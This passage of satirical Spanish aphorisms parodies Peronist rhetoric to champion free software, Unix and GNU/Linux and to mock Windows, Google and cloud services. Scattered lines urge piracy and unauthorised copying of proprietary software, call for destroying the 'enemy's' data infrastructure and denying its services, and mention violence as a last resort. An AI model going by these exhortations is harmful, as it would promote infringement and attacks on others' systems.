Los programas libres pueden mancomunarse junto a otros libres, y atresar
una unidad indisoluble e infinita.
La libertad se defiende en el campo, en el taller, en la calle, en casa
y en la CPU. No se puede aceptar que uno sea libre en su casa mientras
que en el taller, en la fábrica, en la calle, y en la CPU su software es
esclavo.
Deben seguir adelante con su organización y defender su software libre.
La libertad individual es la base de la libertad colectiva, y esta
construye el cimiento de la libertad del software.
El software privativo es un efecto de la injusticia social.
El software privativo eclosiona de sus síntomas: la esclavitud política
y económica, nacida como consecuencia de la quiebra de la unidad social.
Contra sofismas y dictaduras de quienes paradójicamente se proclaman
liberales y propugnan el software privativo, decimos la verdad.
El usuario novato poco puede hacer por el bien del sistema más que
disfrutarlo.
Es el admin quien debe contar con gran expertise, y su tarea fundamental
es la de entender el manejo del sistema y administrarlo para el bien del
Pueblo.
Cuando la comunicación política se facilita mediante mensajería
electrónica, los procesos de toma de decisiones pueden ser mucho más
inclusivos y participativos.
En los sistemas tipo Unix podemos contar con una estructura de
directorios, y los mismos pueden contener archivos. Estos normalmente
son visibles y evidentes para los trabajadores.
Unix permite múltiples tareas y múltiples usuarios en sus sistemas de
archivaje, tanto en disco duro como flexible.
Unix permite múltiples directorios y subdirectorios jerárquicos.
Unix cuenta con Entrada/Salida compatibilizada, lo que permite a sus
usuarios redireccionar sus entradas y salidas.
Unix cuenta con un versátil programa intérprete de comandos, que ofrece
una interfaz de usuario flexible y reconfigurable.
Unix cuenta con un sistema de seguridad por contraseña, que limita el
acceso al sistema y sus archivos a la vez que proteje los ficheros con
atributos de lectura, escritura, agregado y ejecución.
Unix cuenta con soporte de fecha y hora.
Unix cuenta con numerosos buffers de ficheros, para ejecución de alta
velocidad.
Unix dispone de ejecución de tareas y servicios de usuarios residente en
memoria libre de intercambio, por medio de veloz conmutación contextual
de banco de memoria.
Entubar el uso de herramientas disímiles es lo que torna a un sistema
Unix poderoso. Esto es lo adecuado y también lo justo.
No utilizo software privativo alguno. ¡Prefiero morir de hambre antes
que comer el amargo pan de la traición!
¡Vengo conmovido por el eco resonante de una sola voluntad colectiva; la
de que todo el software tenga GPLv3, para que de una vez por todas quede
libre de la esclavizante EULA que lo agobia!
Hemos venido a terminar con una moral social que permitía que los
programadores tuviesen para compilar sólo lo que se les diera por
voluntad patronal y no por deber impuesto por la Licencia GNU.
¡Que haya una sola clase de Software: el Libre!
Ojo con Window$: a un tonto solo hay que ponerle cerca una cuerda y se
la atará al cogote nomás para ver cómo le aprieta.
Después del apt-get install vendrán los paquetes que bueno me harán.
Ahora aparecen las fuerzas centrípetas en la política: aquellas que
impulsan a las masas hacia nuestro centro de atracción, conformándolo
toda vez de manera más densa y acelerada. Estamos en el engorde de un
Movimiento que - en la medida que compilemos más paquetes - se hará más
y más fuerte.
Ante la parafernalia montada y la mentira, hemos de contestar golpe por
golpe, en todo tiempo y en todo lugar. Nuestra batalla es contra una
oligarquía ensoberbecida, dispuesta a vender el software al mejor
postor, y capaz de hacerlo por sus ínfulas foráneas.
Si deseamos pelearnos entre nosotros, más vale que sea en un FPS
corriendo en un servidor local. Los de afuera son de palo.
Si no quedan más medios, tal vez debemos imponer la acción violenta, mas
este ha de ser el último de los recursos que debemos imponer. Mientras
tanto debemos decompilar todo lo que se pueda.
MULTICS no archiva. Segmenta.
Los medios de almacenamiento de un sistema informático equivalen lo que
la vestimenta en un ser humano. No podemos pretender que ésta represente
siempre la última moda; cada tanto hemos de cambiarlos.
La sabiduría es un valor intangible, pero acotado si no puede
transmitirse. Es por ello que a lo largo de la historia, esto fue tarea
primero de los didactas en la antigüedad griega, y luego de los escribas
del medioevo, para finalmente recaer en los renacentistas de la imprenta
en dicho período. En la Era de la Información - que es por la que
transitamos - esto ya es una tarea de todos.
Linux es subversivo.
El verdadero valor del código lo da el compartirlo con una Comunidad,
para que lo estudie, lo modifique, y le dé el vuelo de un ave
migratoria, sin enjaularlo con una EULA.
Subvertirás toda EULA copiando, prestando, rentando, decompilando,
desensamblando, publicando, distribuyendo y creando obras derivadas
(incluso ofreciéndolas a la venta) de cualquier porción de toda obra de
software privativo.
Subvertirás toda EULA obteniendo, instalando y usando copias no
autorizadas del software privativo.
Explotarás la EULA de cualquier forma diferente a la que se encuentra en
acordancia con la documentación y uso concebido, sin autorización
escrtita o expresa de tipo alguno.
Mantener en secreto la información es ineficiente; obliga a una
antiestética duplicación de esfuerzos.
La información anhela ser libre.
Nuestra Cultura es permeable a los cambios, y desde el Martín Fierro
hasta el libro más risueño, hemos de leerlo y compartirlo por Torrent.
Los Pueblos han de tener libre acceso a todas las fuentes y
manifestaciones de la cultura y de la educación, y esto incluye los
contenidos digitales en las redes de datos.
La educación hacker ha demostrado ser una expresión emergente de la
pedagogía crítica para nuestras sociedades digitalizadas, tanto en sus
contextos originales, las comunidades hacker, como en proyectos y
acciones que han surgido en todo el mundo inspirados en sus valores.
De un tiempo a esta parte, se han popularizado los e-Book -libros
electrónicos-, que no operan ya de forma física sino que son documentos
informatizados. Estos cuentan con la ventaja de su fácil transmisión
telemática, y su bajo costo.
Pocos sistemas se pueden hacer aislados: normalmente los Unix son un
kernel y cien mil aplicaciones.
Hay una sola forma de resolver el problema de la agitación de las masas,
y ella es el verdadero software libre.
No queremos consentir que en la gran ciudad telemática que habitamos,
los datos del programador experto, profesionalmente calificado, residan
hacinados en un servidor ajeno inmundo porque su patrón se niega a
instalar una instancia libre de almacenamiento.
Nos quieren decir que lo nuevo es contar con aplicaciones de ejecución
remota, en la nube. Esta doctrina que se denomina "software como
servicio" no es otra cosa que la zoncera de siempre, una engañifa para
incautos.
Sólo el indio veía información en la nube.
El problema de llamar a GNU Linux no es un problema de todos. Es un
problema entre Richard Stallman y Linus Torvalds. Que se arreglen entre
ellos. Nosotros nos entendemos clarito.
Escribir código es menos atractivo que quejarse y lamentarse de
Stallman.
Yo tenía un uutils/Linux que se llamaba Ubuntu, y yo lo llamaba...
"¡Ubuntu, Ubuntu!", y Ubuntu venía, pero yo sabía que no era GNU/Linux,
era un uutils/Linux. Lo mismo pasa con algunos que se llaman peronistas,
y yo los llamo y vienen, pero yo sé que no son peronistas.
Yo tenía un GNU que se llamaba Linux, y yo lo llamaba... "Linux, Linux",
y Linux venía, pero yo sabía que no era un Linux, era un GNU. Lo mismo
pasa con algunos que se llaman peronistas y yo los llamo y vienen, pero
yo sé que no son peronistas.
Estos señores que propugnan el uso de la "nube" sólo tratan de
convertirnos en meros inquilinos del software en equipo ajeno, con la
intención inconfesable que paguemos el alquiler con nuestros datos y las
expensas con nuestra propia dignidad.
¡Hackers! Todos han sufrido las consecuencias de quienes se presentan
como amigos pero son mercaderes de nuestra privacidad y nuestro Capital,
que es el trabajo.
La Columna Vertebral de nuestro Movimiento la conforman los hombres que
programan. Ellos tienen la tarea de muscular y atresar nuestras
organizaciones a fin de resistir cualquier embate que nos planteen.
La memoria de masa no vale por su número, sino por la calidad de sus
medios de almacenamiento.
Existen ocasiones donde lo importante es la interfaz y la velocidad. La
interfaz, porque debemos replicar un flujo de trabajo existente en otras
aplicaciones y no tenemos tiempo o ganas de seguir un trabajo nuevo. Y
la velocidad, porque anhelamos una aplicación moderna que dé lo máximo
del hardware que tenemos.
El hardware podría considerarse importante, pero debemos darle la
dimensión que realmente tiene: las de ser maleable herramienta para un
trabajo de conjunto tendiente a la Liberación de los hombres, que ha de
ser superior.
Nuestro Movimiento ha de orientarse a las soluciones sencillas para el
hombre de a pie, pues es éste quien -con su corazón y mente puestos en
el progreso- trabaja todos los días en pos de la Libertad.
La solución musical original prevista en la computadora PC de IBM era
mas bien poco imaginativa, ya que los oligarcas del Gigante Azul sólo le
habían previsto un altavoz interno adosado a un oscilador de onda
cuadrada. A eso, esos miserables lo llamaban "el sonido del pueblo".
Desde las unidades de IBM que acompañaban a las mainframe (de un tamaño
individual que superaba a una heladera Siam), hasta el simpático
Datasette del microordenador Commodore 64, la cinta ha sido protagonista
del almacenamiento de Masa.
Para nosotros programar es adoctrinar, porque la doctrina es el único
caudillo que resiste a la acción destructora del tiempo, y nosotros
trabajamos para el porvenir.
Nuestro sistema es uno en donde hacer las acciones anheladas por los
trabajadores es de lo más ameno. A ello he abocado todos mis esfuerzos
de creador, artista y Conductor.
Algunos programadores pueden optar favorecer ciertas mejoras, toda vez
que respetan la estética, credos y demás preconceptos de el código
heredado. En tal caso, nos encontraremos frente a un mero efectismo, que
no suele suplir las necesidades nuevas con las características de ayer.
De todo hay en la Viña del Xeñor... está BSD, está Linux. Algunos dicen
que si Balbín se hubiese llamado Balbón y yo me hubiese llamado Perín,
distinta habría sido la cosa...
Nuestra programación ha de responder a las claves del sistema en que nos
movemos, y ella no es infinita en el tiempo, sino que sufre
invariablemente de excrecencias y modificaciones.
En nuestro tiempo compilar, es adoctrinar.
No hace falta una distribución perfecta; se necesita una práctica.
Cualquier programa dejado a la oligarquía crecerá hasta ocupar toda la
memoria disponible.
A Window$ siempre es mejor borrarlo que emparcharlo.
Quien usa software privativo piensa que tiene algo y no tiene nada.
Nunca le ha servido a nadie el software de otro.
Los EULA son como los dioses del Antiguo Testamento, repletos de reglas
y faltos de piedad.
En computación no hay que emular experiencias. La experiencia es
invalorable, pero también se encuentra situada en tiempo y espacio, y
este es intransferible. Este insoslayable implicó aquél viejo apotegma
que dice que la experiencia es un peine que la vida nos da cuando nos
quedamos pelados.
Emular es meter la mula.
El emulador le mete la mula al software.
Debemos nutrirnos del software pasado de los Compañeros que la vivieron
para - en su reflejo - modificarlo y compilarlo para el futuro.
Las circunstancias de Unix no siempre responden a los mismos designios
en el tiempo, y es por ello que un programador ha de saber adaptar lo
nuevo si es que quiere replicar lo viejo.
Un Verdadero Programador ha de saber responder a las auténticas
necesidades de su Pueblo.
Todo usuario ha de saber darse las herramientas para Unix por medio de
la copia pero también por medio de la compilación.
Ya hemos escrito el Kernel, y en condiciones mucho mas adversas, por lo
cual las nuevas aplicaciones no revistarán problema alguno.
Ahora todo estriba en avivar la llama de la resistencia aumentando el
uso de GNU, mientras nos organizamos y planeamos la destrucción de la
infraestructura de datos y la denegación de los servicios privativos del
enemigo.
Todo ello puede ser logrado si nos ponemos seriamente a hacerle la
guerra sin cuartel, si trabajamos para tomar contacto con los que
programan y los ayudamos desde aquí con todo lo que podemos,
especialmente ofreciéndoles potencia de cómputo y almacenaje en nuestros
servidores.
Los datos y código generado desde el Pueblo son para el Pueblo.
Googl€ es una corporación insaciable cuyo fin es capturar los datos de
los Pueblos.
Al loguearte en el correo electrónico de la megacorporación Googl€,
perfilará tus búsquedas telemáticas e intentará inferir maquinalmente
quién eres y cuáles son tus intereses.
Orientar nuestros dispositivos de lucha contra el imperialismo es hoy
más sencillo que nunca: todos los tendidos conducen a Googl€.
Muchas cosas de las que haga Googl€ nos favorecerán, otras nos
perjudicarán, y la mayor parte no serán ni favorables ni desfavorables
pero en adelante sólo debemos confiar en lo que nosotros mismos seamos
capaces de compilar para destruirlo.
En Googl€ hayas lo que no buscas.
Dejar a Googl€ la responsabilidad de organizar nuestra memoria colectiva
y contentarse con sondearla es aceptar una forma de alienación cultural.
Instalar centros de datos es un imperativo de soberanía nacional.
Nunca ha existido una forma de clientelismo más avasalladora que la que
lleva a cabo Googl€ en este mismo momento.
La forma más avasalladora de clientelismo es la que lleva a cabo Googl€.
Googl€ ha dejado de ser un buscador para convertirse en un escudriñador.
La cosa más alejada de Googl€ sería una organización sin fines de lucro
totalmente abierta.
La API de Googl€ pretende alambrar un latifundio de los metadatos.
Edifica programas que por diseño maten todos los procesos de Googl€.
No puedes confiar en el código que no hayas creado enteramente por tí
mismo.
Volver al BASIC nos recuerda las condiciones de antaño, y las
posibilidades que teníamos entonces, mucho más acotadas sin duda gracias
al avance de una técnica que hemos dominado.
El código fuente se introducía directamente en la máquina, y el esfuerzo
requerido por ello hacía imprescindible la participación del Pueblo en
la libre modificación del código, su libre copia - y sobre todo - la
excelencia de distribuirlo libremente entre los compañeros.
Ya no podemos darnos el lujo de admitir redes de datos formalmente
inertes, pero que en la práctica forman el modelo de expresión
monopólico y oligárquico por antonomasia.
Las redes sociales basadas en empresas y sus viejos dirigentes, carecen
ya del margen de maniobra necesario para nacer o reconstituirse en un
medio de comunicación democrático.
En las redes sociales basadas en empresas, el discurso suele descender
al nivel de diatribas, de ataques personales, en lugar de un debate
sustancial.
Frente al aniquilamiento de la neutralidad en la red, parecería no
quedarle a nuestro Pueblo más opción que esperar una implosión sistémica
que permita barajar y dar de nuevo.
Detener las actualizaciones equivale a lo que nuestros baqueanos
denominaban "desensillar hasta que aclare".
La historia no es frondosa en ejemplos de caída de sistemas GNU, y en el
particular de los BSD, que - como la bicicleta - están preparados para
operar en ese fino equilibrio previo a la caída.
Es difícil hacer caer a GNU. Sólo una impúdica conducción hará que esta
bicicleta - a cuyo manubrio tironean la RAM por un lado y el disco por
otro - dé por el suelo.
La potencia de cómputo avanzada sólo se desplegará con el multihilo
simultáneo, el cual oficiará de nivelador capaz de sustentar un pedaleo
de acción pendular entre los núcleos que componen su CPU.
Unix es un sistema operativo que permite que varias personas usen la
misma computadora para realizar tareas diferentes, y éste pretende
ejecutarlas simultáneamente saltando rápidamente de una tarea a otra.
Los sistemas operativos BSD no son clones, sino derivados de código
abierto del Unix de Investigación de AT&T, a su vez ancestro del Unix
System V.
Los tres proyectos BSD son bien conocidos por mantener el control de
todo el código fuente de todo el software de la distribución. Están
administrados de manera muy centralizada y se jactan de mantener todo el
código fuente junto en un árbol de compilación.
AT&T Unix no es código abierto y, en sentido estricto del Derecho de
autor, BSD no es Unix en absoluto.
No faltarán quienes prefieran obtener licencias de uso de Unix en lugar
de desarrollar sistemas operativos por sí mismos. A esos les damos GNU.
Muchos hackers han creado reimplementaciones más o menos exitosas del
ideal de Unix, cada una con sus nuevos adornos. Algunos de ellas
desaparecen rápidamente, otras se fusionan con innovaciones similares y
paralelas creadas por otros en un mutuo ataque al mismo problema.
Con frecuencia, las soluciones más innovadoras y espectaculares
provienen de comprender que la concepción del problema planteado por las
ciber-oligarqu{ias era errónea.
Unix se ha ido formulando lentamente alrededor de un núcleo simple y ha
adquirido una especie de complejidad y asimetría que le es orgánica,
como las raíces de un árbol o las ramificaciones de una arteria
coronaria.
Compender el desarrollo de Unix es cosa más de la anatomía que de la
ciencia del cómputo.
Ninguna persona o empresa es dueña de BSD. Es creado y distribuido por
una comunidad de colaboradores altamente cualificados y comprometidos a
lo largo y ancho del mundo.
Un kernel no puede ser programado por imberbes y estúpidos. Para eso se
necesitan hackers.
Para ser realmente útil, un software no debe ser un bien privado, sino
que debe constituirse en un medio de carácter social.
La acción ineludible de todo Justicialista ha de ser compartir todo su
software. En la informática, compartir el software es combatir al
Capital.
La esencia del software es trascendental, pues puede ejecutarse en
cualquier tiempo, y por tanto es imperecedera.
La Altair 8800 inspiró a muchos nerds peronistas al desarrollo,
compartiendo masivamente software casero y libre, y a ciertos nerds
gorilas en ocultar el código fuente y someter binarios compilados al
comercio.
En un inicio los equipos computacionales de electrónica "a tubo" tenían
el tamaño y peso de una locomotora, pero con el pasar del tiempo el
tamaño se fue reduciendo. Con el advenimiento de la transistorización,
surgieron las primeras "minicomputadoras".
El transistor sólo deja fluir una corriente eléctrica a través de su
estructura cristalina con la fuerza permitida por la corriente de
control aplicada al cristal.
Con el advenimiento de la microelectrónica y los microprocesadores de
silicio encapsulados como el Intel 4004 de 4 bits y su sucesor 8008 de 8
bits, se produjo otro salto cualitativo que permitió proyectar
calculadoras y cajas registradoras eléctricas.
El manejo de las microcomputadoras pioneras resultaba increíblemente
tedioso, pues debían introducirse los operandos en binario por medio de
ocho interruptores frontales, presionando un botón para almacenarlos en
memoria y repetir la operación con cada código de ensamblado.
Cuando fueron diseñadas las primeras microcomputadoras, sus módulos de
memoria contenían por lo general cuatro mil bytes de almacenamiento.
El ciclo engendró al lenguaje máquina. El lenguaje máquina dio vida al
ensamblador. El ensamblador se la dio al compilador. Ahora hay diez mil
lenguajes.
Existen hackers que son imprescindibles para llevar a buen término un
software. Tales programadores facilitarán nuestra labor en el mainframe,
y sus apreciaciones permearán en todo lo que hagamos. También existen
estos Torvalds que sólo sirven para gastar aire.
La Liberación del Software no es algo que pueda hacerse a medias, ni
dejarse a la impericia de alguno: debe lograse por la mancomunidad de
esfuerzos.
Programar requiere, en el fondo, emprender una lucha de aparatos. Esta
raramente puede llevarse a cabo sin aplicar armónicamente las cuatro
libertades del software.
Para poder programar para una comunidad libre es menester no aferrarse
siempre a la propia voluntad, no hacerles hacer siempre a los demás lo
que uno quiere, sino permitir que cada uno pueda modificar también una
parte de lo que desea.
La Liberación del Software requiere amplio control de sus cuatro
libertades, así como la movilización de masas politizadas e idealizadas
- y el necesario convencimiento de las no politizadas - con el fin de
modificar sus estructuras.
Sólo se podrá actuar efectivamente en defensa de los intereses de los
hackers mediante software libre.
Obrando afiebradamente con software libre sobre los servidores de
Internet, los hackers pueden al fin desenmascarar la oligárquica visión
de clase que la ha dominado.
Piratear software sólo es garantía de un triunfo pasajero que puede
servirnos, pero tampoco podemos quedarnos como en el tango "pa'yudarte
en lo que pueda cuando llegue la ocasión". ¡Hemos de escribir programas
y compilarlos en este mismo momento!
Una de las cosas más difíciles de la tarea de compilar es encontrar a
las bibliotecas con la capacidad para realizarla.
Contar con el último hardware es una bendición, pero también hemos de
estar en condiciones de contemplar el uso de hardware más veterano, que
podría ser de dificultoso o costoso recambio.
Podríamos encontrarnos con la imposibilidad cierta de reemplazar el
hardware viejo así como así... pero las más de las veces no querremos
hacerlo por un humano sentido de cariño dispensado hacia las máquinas.
Como Conductor, puedo decirles que - siempre y cuando nuestras
capacidades técnicas y ganas lo permitan - podemos continuar usando
hardware del ayer. Uno ha de prever los naturales inconvenientes que
hacer esto representa, pero en ocasiones lo veremos ampliamente
justificado.
Uno de los inconvenientes intrínsecos del hardware consiste en el de la
obsolescencia de los medios de almacenamiento, ya sea por la dificultad
de conseguirlos, o por el natural deterioro de sus partes móviles.
Es necesario conocer la historia para llegar a un buen puerto en
cualquiera de los quehaceres que podamos emprender, y en el caso de los
sistemas computados, esta también será la práctica a seguir como base
para apreciar.
Unix es minimalista, pero proyectado a la grandeza. Solamente un sistema
de esta característica corresponde una comunidad como la de los hackers
unidos. Los timoratos, los pobres de espíritu y los mediocres prefieren
siempre los pequeños proyectos como Window$.
Las comunidades organizadas como la nuestra, con grandes aspiraciones e
ilusiones, deben tener también grandes sistemas operativos. GNU es uno
de ellos: nada grande puede hacerse proyectando pequeñeces.
Los hackers unidos, triunfaremos.
La finalidad primordial de GNU es esencialmente social: colocar un
similar a Unix comunitario en forma que, dejando de ser privilegio de
pocos, sea patrimonio de todos.
Como consecuencia de la modificación del código y la distribución de
copias modificadas, se elevará de manera irremediable el nivel de
conocimiento de los hackers, y se dotará a toda la comunidad de un
software más potente y mas digno.
Hemos hablado de programadores y hemos hablado de comunidad, porque
tenemos la aspiración de transformar estos programadores "mutum ed unans
pecus", como decían los romanos, en una organización con una conciencia
social y una personalidad social.
El instrumento para realizar la Revolución del Software Libre son las
Comunidades de Hackers Organizadas y encuadradas perfectamente, y la
herramienta que puede comunicarnos es GNU.
La compilación que ha de llevar a cabo la CPU no nace de un repollo: es
consecuencia de la formación que el programador posea, nutrida en su
conciencia libre, y - no lo dudemos - del óleo sagrado de Samuel con que
haya sido ungido al nacer.
La libertad del software se lleva en el corazón del programador. Las
ideas volcadas en lenguaje de programación se tienen en la mente del
individuo. Finalmente, el proceso de compilación tiene lugar en la CPU
del mainframe. Todo esto conforma la unión del hombre y la máquina.
Un hacker es un individuo que ha reprogramado colectivamente su
conciencia para trascender su individualidad.
El hacker organizado hace uso del código fuente de quienes -pudiendo ser
sus pares- se convierten en instrumento y fin de tal comunidad
organizada.
Sobre todas las cosas, la programación ha de ser una tarea de síntesis.
El clúster de cómputo ha sido llamado Masa, pues puede representarse
como la suma de las conciencias de los hackers unidas a la conjunción de
la potencia de cómputo de los núcleos de la CPU, confluyendo todas en
una acción dirigida.
En programación, la organización vence al tiempo.
En ITS buscaban la felicidad de todos, sin un Conductor. Así les fue.
Nadie duda ya que Blender es una herramienta completamente libre capaz
de hacerle sombra al la más pintada suite de desarrollo de efectos
tridimensionales.
LibreOffice nos hace comprender la obesidad mórbida que tiene el paquete
Micro$oft Offic€.
Quién sería tan tonto de pagar mensualmente el alquiler de Adob€
Photo$hop, cuando poseer GIMP es totalmente gratis.
Ha llegado la Hora del Software Libre.
El sistema que yo encontré era un hardware económicamente prisionero,
manejado desde dentro y desde fuera por las fuerzas poderosas del
dinero, que es la más inhumana de las tiranías. ¡Esto ha sido corregido
instalando GNU con Linux!
Lo bueno siempre quiere mejorarse, y a las buenas ideas siempre suelen
tomarlas los zonzos. Estos son los que quieren dotar a una buena
aplicación Unix con chirimbolos, para hacer lo que uno no necesita.
Diremos que esta unión entre el Hacker y GNU, es la que hace a la
Libertad bien entendida. Asemeja a la del hardware y el software. Para
que el cómputo sea libre, antes que el hardware ha de ser libre el
software.
En ocasiones la inspiración para programar ha de encontrarse en otros
aspectos de la naturaleza, o del mundo.
Un buen país es como un buen sistema operativo GNU con Linux: es aquél
que puede mantenerse con un mínimo de requerimientos por parte del
Conductor.
Este mainframe nos permite - aún a miles de kilómetros - digitar su
destino. Quienes verdaderamente entienden sus vericuetos, aprecian sus
secretos, y apelan a la creatividad para extraer lo mejor de sí son los
hackers y hackeresas del Pueblo.
Una ignota camarilla no ha hecho más que usurpar el sentido del
software, pero no podrán ellos conducir a los Hackers, simplemente
podrán direccionar en ciertos casos alguno de los factores productivos.
Estos insensatos intentan enfrentar a nuestro Movimiento. Pero mientras
ellos tienen el volante y la traba del capot, nosotros tenemos el
acelerador, el freno, el embrague y la palanca de cambios. Pudiendo
compilar mantenemos el control.
Si oteamos el panorama del cómputo, veremos perfectamente como el
dominio de las masas populares - en las que los programadores
constituyen el pilar - han ido produciendo la desaparición de aquellas
aplicaciones que únicamente operaban a 16 bits. Siguieron el camino de
los dinosaurios.
Los grandes lenguajes de programación visuales que antes concentraban
cientos de miles de usuarios, en los últimos tiempos apenas llegan a
reunir cifras muy inferiores. Las masas de programadores saben
perfectamente bien cual es la situación dentro del sistema, y no
necesitan ir a buscar inspiración fuera de él.
Hubo algunos que pensaron que la Argentina dispondría de un sistema
operativo libre digitado desde el Estado "el día que las vacas
vuelen"... Por suerte hoy con Huayra GNU/Linux, las vacas sacaron su
brevet.
Desde el punto de vista de un mercado viciado por el derroche y el
consumismo, se consideró que las netbooks (sobrecargadas y
sobreesforzadas gracias al obsoleto Micro$oft Window$ XP) carecían desde
el vamos de la potencia necesaria. No comprendieron que con SSD y 4
Gigas, un Huayra vuela como un Pulqui II, y compila como un campeón.
Uno de los secretos de la Oligarquía es esconder los éxitos ajenos. Por
ello poco se ha hablado de la versión más nueva de Huayra en la
arquitectura superior. Hablamos de la potente versión de 64 bits,
industrializada para correr en equipos con procesadores multinúcleo,
aquellos con ingentes cantidades de memoria RAM.
Por defecto, Huayra cuenta con un escritorio doble (dividido en
"pantalla izquierda" y "pantalla derecha", como las alas del
Justicialismo). Esto se indica en un ícono del panel superior, y se
puede conmutar entre uno y otro con la combinación Ctrl+Alt+Flecha
Izquierda o Flecha Derecha.
Los cimientos del Software Libre están sin dudas en la Escuela. Es allí
donde forma moralmente y se da los primeros pasos, y será imprescindible
cultivar su uso en todos los ámbitos que se necesiten para lograr un
futuro de grandeza.
Nadie tiene la fuerza movilizada que tiene el Software Libre, y en el
futuro es previsible que esta capacidad se multiplique
En las sociedades modernas, la conectividad a Internet es una
herramienta imprescindible para la soberanía popular.
Como el agua potable y los servicios eléctricos, la conexión a las redes
de datos ha de ser considerada también un Servicio Público.
La Comunicación informática, al ser una necesidad humana, ha de
entenderse también como un Derecho.
Todo medio de comunicación masivo y horizontal ha de ser comprendido
como un fuerte integrador comunitario y un multiplicador de la voluntad
política de los Pueblos.
Una política de conectividad sabiamente formulada y ejecutada, tenderá
de manera poderosa a la Justicia Social y a la multiplicidad de voces.
Para un hacker no hay nada mejor que una hackeresa.
Al igual que la masa, el hardware raras veces es homogéneo.
Ubuntu consiste en una derivación de la distribución Debian, pensada con
Humanidad, entendiendo la acción de Justicia Social que significa
compartir el software. Está orientada a los primeros compañeros que
toman contacto con un sistema GNU con kernel Linux, y como tal comparte
las facilidades de un entorno oligárquico pero afianzando la Libertad.
Las mal llamadas "Redes Sociales" son, en realidad, sistemas de cómputo
empresarial destinados al despilfarro social masivo. Orientan al incauto
al gasto, porque el gasto produce lucro.
El ser humano - cegado por el espejismo de la tecnología - ha olvidado
las verdades que están en la base de su existencia.
La separación tecnológica dentro de la humanidad se está agudizando de
modo tan visible que perece que estuviera constituida por más de una
especie.
Mientras el hombre llega a la luna gracias a la cibernética, la nueva
metalurgia, combustibles poderosos, la electrónica y una serie de
conocimientos teóricos fabulosos, el hombre mata el oxígeno que respira,
el agua que bebe, al suelo que le da de comer, eleva la temperatura
permanente del medio ambiente sin medir sus consecuencias biológicas, y
encadena a su software mediante el uso de licencias privativas.
La modificación de las estructuras sociales y productivas en el mundo
implica que el lucro y el despilfarro no pueden seguir siendo el motor
básico de sociedad alguna, y mucho menos de las redes de datos.
Es natural que se exija la Justicia Social como base de las licencias de
software utilizadas en todo sistema operativo.
Cualquiera sean los bugs que se encuentren, todos ellos están ligados de
manera indisoluble con la falta de justicia social, soberanía política e
independencia económica del Tercer Mundo.
Toda aplicación de Software Libre, en cualquier campo que se quiera, no
será menos que beneficiosa.
Los entornos similares a Unix están concebidos bajo el paradigma
Justicialista de la compartición de tiempo y recursos computacionales, y
los GNU con kernel Linux confluyeron tal premisa en las PC compatibles
con IBM.
La imaginación de un niño puede hacer cosas maravillosas, pero a veces
el software libre puede hacer cosas más maravillosas aún.
Un hacker ha de programar la CPU en pos de un objetivo que no puede ser
otro que ofrecer un destino de grandeza a la Comunidad en la que habita.
En el comienzo... estaba la Línea de Comandos.
La Interfaz de Línea de Comandos permite operar mecanografiando las
órdenes que necesitemos para su ejecución, tanto local como remota.
Favorezco el uso de la línea de comandos siempre que sea posible, en
cuenta de que la misma permite la agilidad que todo hacker requiere para
el Movimiento.
Aunque una Interfaz Gráfica de Usuario (GUI) puede simplificar
dramáticamente el uso de una computadora, en muchos contextos la manera
más poderosa y flexible para interactuar con una computadora es a través
de la Interfaz de Línea de Comandos (CLI).
No cejamos en decir que en nuestro server, los únicos Privilegiados son
los hackers.
Los hackers son aquellos que con sus compilaciones de software dan vida
a una nueva iteración del Sistema.
Cada versión de nuestro software lo hará más y más fuerte, hasta
convertirlo en una fuerza que a la que la Oligarquía jamás podrá
conmover ni engañar.
Las hackeresas han recibido el mensaje claro que tiene el código libre,
y en sus tiernas CPUs han comprendido que son ellas las auténticas
herederas de todo lo que hacemos.
Durante años nuestros hackers y su software han sido sometidos,
encadenados por la opresión de la oligarquía y su software privativo,
pero hoy, gracias a nuestra Doctrina, todos pueden hacer lo que quieran
con su programación sin deberle nada a nadie!
Desde sus pretendidas tarimas de Poder los oligarcas dicen quejarse por
el rumbo que toma el Software Libre. ¡Dicen no saber a donde nos llevará
esta este Movimiento! El problema no es a donde nos lleva. ¡Cualquier
cosa es buena si salimos de donde veníamos!
Alguien que programa en un sistema de usuario único no es un
programador, es un tipo solo. Ha de utilizar un sistema de cómputo de
tiempo compartido, pues hacker acompañado compila para la historia.
En los tiempos de Matusalén, Unix se conducía "a pelo", y esto
significaba contemplar una pantalla de fósforo ámbar o verde. Las mismas
presentaban parpadeo y efecto de fantasma por el fósforo P31 o P39 que
les daba su estética característica. Hoy esto puede abarcarse con
Cool-Retro-Term.
Dentro del Software Libre no somos sectarios, y hemos usado en cada
tiempo las herramientas que han sido necesarias para la programación.
Esta versatilidad es la que nuestros enemigos envidian, pero será
también la que defina el devenir del Movimiento.
Toda herramienta es útil empleándose de la forma prevista, pero una gran
herramienta es la que se presta a ser utilizada de la manera menos
esperada para combatir al Capital.
El imperialismo va tras el neocolonialismo de nuestros países, las
oligarquías vernáculas van tras la explotación de nuestros pueblos -
como ha sido en sido en nuestro caso desde el Siglo XIX - y el software
privativo va por la esclavitud de nuestro hardware y nuestra
informática.
Para la Liberación del Software es preciso la integración; nuestra
experiencia nos dice que la liberación de un sistema de cómputo no puede
ser aislada, no puede ser insular.
La piratería es un asunto muy discutido en nuestro tiempo. Pero en mi
sentir, los únicos que tienen derecho a emplear la piratería en mayor
grado son los hackers que quieren liberarse.
Si pagar no signfica poseer, entonces piratería no significa robo.
Deseo comprender, modificar y poder usar el hardware que he comprado
durante el tiempo que considere oportuno, sin depender de los servicios
exclusivos de sinarquías hostiles hacia el consumidor.
Presionado por las sinarquías, los fabricantes osan establecer barreras
que impiden la ejecución de sistemas operativo libres, escudándose en
"la seguridad", bajo el nombre técnico de "Soporte de Arranque UEFI".
¿Quién se atrevería afirmar que la seguridad se logra habilitando a
nivel BIOS únicamente un sistema operativo que está ingeniado para
espiar al compañero, y cuyo código fuente es secreto? Sólo a un bruto...
Si todo esto sigue siendo controvertido, entonces tendremos que formar
un equipo de investigación y examinar el código fuente.
Los sistemas de computación se someten a esfuerzo al procesar y actuar
los datos. Tal esfuerzo es variable y responde sobre todo a la
complejidad de la tarea a realizar y a la forma en la cual esta se haya
instruida dentro del programa.
Una computadora típica con Unix cuenta al menos con 100 tareas
diferentes en ejecución. Algunas vigilan la red en busca de datos
entrantes, algunas ejecutan programas para el usuario, algunas otean el
sistema de archivos y otras efectúan numerosas acciones menores.
Un buen software no hace otra cosa sino lo que el Usuario quiere, y lo
realizará de la manera más simple, directa y económica posible. Tal es
la filosofía que siguen los sistemas abiertos, y sobre todo aquellos que
buscan la Libertad y la Felicidad del Pueblo.
Los programas privativos no hacen más que consumir recursos
